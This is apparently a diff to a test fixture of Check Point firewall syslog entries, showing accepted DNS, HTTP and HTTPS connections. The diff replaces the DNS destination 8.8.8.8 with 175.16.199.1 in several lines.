 <134>1 2020-03-29T16:57:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x7,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.67"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52034"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d376,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501046"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51578"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d376,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501046"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51578"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d376,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.54.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55786"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d376,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38104"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:57:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d376,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55175"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
@@ -1743,9 +1743,9 @@
 <134>1 2020-03-29T16:57:32Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d37c,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64435"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:57:32Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d37c,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43372"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:57:32Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d37c,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44361"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:57:36Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d380,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501056"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:36Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d380,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501056"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:36Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d380,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"216.58.208.106"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48514"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:36Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d380,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501056"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:36Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d380,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501056"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:36Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d380,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.67"; log_delay:"1585501056"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52040"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d38d,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63167"; service:"137"; service_id:"nbname"; src:"192.168.1.196"]
 <134>1 2020-03-29T16:57:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d391,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50060"; service:"443"; service_id:"https"; src:"192.168.1.117"]
@@ -1756,37 +1756,37 @@
 <134>1 2020-03-29T16:58:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d39f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"216.58.211.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44134"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3a1,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:58:11Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3a3,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:58:12Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a4,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501092"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50195"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:12Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a4,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501092"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50195"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:12Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a4,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.19.196"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42728"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a4,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.206"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41324"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a4,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.206"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41326"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a4,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.206"; log_delay:"1585501092"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41328"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40874"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57610"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40874"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57610"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
